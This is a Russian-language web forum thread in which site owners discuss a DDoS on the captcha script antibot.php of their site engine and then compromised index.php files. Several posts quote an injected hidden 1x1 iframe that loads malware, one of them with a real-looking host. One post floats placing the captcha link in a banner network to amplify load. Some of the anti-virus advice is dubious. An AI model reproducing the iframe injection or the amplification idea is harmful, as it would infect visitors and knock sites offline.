Возможно проведение DDoS атаки

[Allseek 0]

1. версия 5.2....я думаю и в 5.3 тоже самое..

2. Ддос идет на 1 файл (engine/modules/antibot.php?run=====*** вместо звездочек любая комбинация чисел...вводя вместо звездочек цифры разные на бум...будет выводится картинка защищающая от ботов при добавлении комментов или при регистрации нового пользователя) Так вот именно на этот файл и идет ддос...нехилый

3. Как с этим бороться можно?

Я впринцепи отключил каптчу при регистрации новых юзеров...и файл сделал пустым....но ддос все равно идет хотя файл и пустой )

а до тех пора пока не просекли как ддос иде, сервер ели дышал..как файл чистым сделал полегче стало...ддос уже 4-ый день идет...

[celsoft 6222]

Allseek,

При DDOS это не решение, завтра будет DDOS на index.php, вы что обнулите index.php. Нужно отслеживать IP с которых идет DDOS и блокировать подсети. Так тупой бот будет до бесконечности пытаться распознать картинку даже которой нет, если имеет доступ к серверу.

[xsash 9]

на самом деле капча это серьезное уязвимое место для сайтов/движков, ибо при формировании капчи тратяться ресурсы (имхо порой больше чем на саму страницу).

как вариант (видел на bigmir.net) у них были готорые заготовленные капчи (около 100k картинок, они папку не закрыли для просмотра =)), но это тоже не выход, ибо можно собрать себе такую коллекцию и написать "распознаватель" по хешу

[celsoft 6222]

как вариант (видел на bigmir.net) у них были готорые заготовленные капчи (около 100k картинок, они папку не закрыли для просмотра =)), но это тоже не выход, ибо можно собрать себе такую коллекцию и написать "распознаватель" по хешу

Я понимаю что для одного сайта это может быть решением, а для движка? код которого доступен это значит вообще полное отсутствие этой функции.

[xsash 9]

дык я и не говорил что это необходимо делать... хотя, если сделать отдельный скрипт, который бы мог просто нагенерировать таких картинок по требованию пользователя столько сколько нужно, а потом прописать в базу...

+ можно было бы удалять и генерировать заного... например раз в месяц/два/полгода.....

[NetSpider 0]

2. Ддос идет на 1 файл (engine/modules/antibot.php?run=====*** вместо звездочек любая комбинация чисел...вводя вместо звездочек цифры разные на бум...будет выводится картинка защищающая от ботов при добавлении комментов или при регистрации нового пользователя) Так вот именно на этот файл и идет ддос...нехилый

надо сделать, чтобы проверялся ИП и, если попытка зарегистрироваться/добавить комментарий раньше, чем через <заданное время> (например, 30 секунд), просто выводить сообщение, что комментарий можно добавить не ранее <заданного времени>.

ЗЫ

генерирование тысяч картинок - глупость редкая ИМХО.

[xsash 9]

сразу видно, человек знаком с ддосом..... бугагаа

[mmaxim 0]

У мну именно так сервак и положили, после ребута движек выдал что он Not Installed

[kvasoff 0]

вот какая проблема: захожу на сайт - белый экран страница загружена. заменил index.php всё заработало и так повторялось уже три раза. ПОМОГИТЕ срочно в чём дело! меня хакнули?

[Stude_nt 0]

kvasoff,

Преже чем заменять index.php надо скачать его!!! В последнее время ломают не сайты, а серваки и вставляют в индексы всех сайтов на нём, ифреймы (белый экран скорее всего из-за этого).

[kvasoff 0]

kvasoff,

Преже чем заменять index.php надо скачать его!!! В последнее время ломают не сайты, а серваки и вставляют в индексы всех сайтов на нём, ифреймы (белый экран скорее всего из-за этого).

Да именно в этом дело в index.php было вставлен этот код

<?php

<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php

Как с этим бороться? хостеру написать?

заранее спасибо за ответ....

[xsash 9]

поверить на трои машину, сменить пароли на ftp, пнуть хостера

[medi 0]

<?php

<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php

ОПА!! У меня такое уже два дня!

Уязвимость двига?

[kvasoff 0]

вот недавно опять

[xsash 9]

уязвимость хостера, ктото рут поимел =)

либо трои

зы. от темы отвлеклись.

[[sql] 0]

<?php

<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php

А причём тут ддос? это для заражение вирусами делают либо для накрутки счетчиков. Да и Ддос это не уязвимость=) а масовая атака на какой либо сервер запросами, дабы не справился серв и лёг.

[Volfgang 4]

<?php

<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php>

Если у Вас это, значит Вас сильно поимели,

1 - Сменить пароль на фтп и отключить комп от инета, провести антивирусную проверку и проверку на SpyWare, вычистить все, сделать повторную проверку. (Сразу скажу NOD32 Вам не поможет, оптимален вариант Kaspersky+Outpost+SpyBot)

2 - Сменить пароли на все, ибо к Вам попал троян Snatch, по русски "Спи***ли" и все пароли от почты, асек, фтп и т д доступны владельцам сервака с которого троян идет.

3 - Хостера пинать нет смысла, вирус попал к Вам через дырку в IE, он обходит антивирусы и фаерволы эмулируя себя под компонент винды. Выход? Использовать Opera.

P/S сам был жертвой, а недавно ко мне постучали в ICQ добрые люди, сказав что они взломали сервак данного вируса и нашли все мои логи, логи скинули и обещали удалить, но посоветовали поменять пароли на все. Собственно я и сам догадался, что стоит это сделать, ибо в логах что мне дали были мои пароли на ВСЕ.

Вопросы?

[Legonavt 0]

А вы поменьше ставьте nulled версии!

[xsash 9]

а от этого не зависит ничего, все зависит от компетентности хостера и конечного пользователя.

закройте тему, уже давно ушли от темы ддоса =\ а жаль

[Гость fatalenergy]

По поводу каптча, думаю нагрузка при поиске будет куда больше, но интересно, что будет если ссылку на engine/modules/antibot.php разместить в крупной баннерообменной сети?

[andalit 0]

1) можно сделать время (через которое можно повторно скачивать картинку)

2)Можно заменить стат адрес на хеш (который генерируется по нику регистрируемого, или по времени, или ешё както)

3)можно сделать проверку с какой страницы заходит юзер и качает эту картинку.

[gu4ioil 0]

По поводу каптча, думаю нагрузка при поиске будет куда больше, но интересно, что будет если ссылку на engine/modules/antibot.php разместить в крупной баннерообменной сети?

Ты прав. Сервак может слечь, если будет одновременно открыто порядко 50 таких страниц

http://ddos-hack.narod.ru/ruszona.html

Поэтому я бы тоже позаботился о том, что бы ограничить доступ к этому файлу из вне - это ведь непроблемно, ограничивается в файле конфигурации сервера .htaccess

[nukex 0]

<?php

<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php

Это у тебя вирус. Проверь в папке windows файл csrss.exe, такой же файл лежит в system32 - его не нужно удалять.

[USN-Team 0]

<?php

<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php>

Если у Вас это, значит Вас сильно поимели,

1 - Сменить пароль на фтп и отключить комп от инета, провести антивирусную проверку и проверку на SpyWare, вычистить все, сделать повторную проверку. (Сразу скажу NOD32 Вам не поможет, оптимален вариант Kaspersky+Outpost+SpyBot)

2 - Сменить пароли на все, ибо к Вам попал троян Snatch, по русски "Спи***ли" и все пароли от почты, асек, фтп и т д доступны владельцам сервака с которого троян идет.

3 - Хостера пинать нет смысла, вирус попал к Вам через дырку в IE, он обходит антивирусы и фаерволы эмулируя себя под компонент винды. Выход? Использовать Opera.

P/S сам был жертвой, а недавно ко мне постучали в ICQ добрые люди, сказав что они взломали сервак данного вируса и нашли все мои логи, логи скинули и обещали удалить, но посоветовали поменять пароли на все. Собственно я и сам догадался, что стоит это сделать, ибо в логах что мне дали были мои пароли на ВСЕ.

Вопросы?

Очень интересная вещь он может дать о себе знать одним способом просто в IE или в Mozille в низу будет странный пиксель мне чувак в асю стучался буквально час назад с такой проблемой нашел сам вирус в чистом виде называется audiv8index

если найдете ифрайм

<iframe src="http://www.consult-finance.com/temp/index.html" width=1 height=1></iframe>

с ссылкой на этот сайт то выдергиваем кабель и удалаем все нахрен к чертям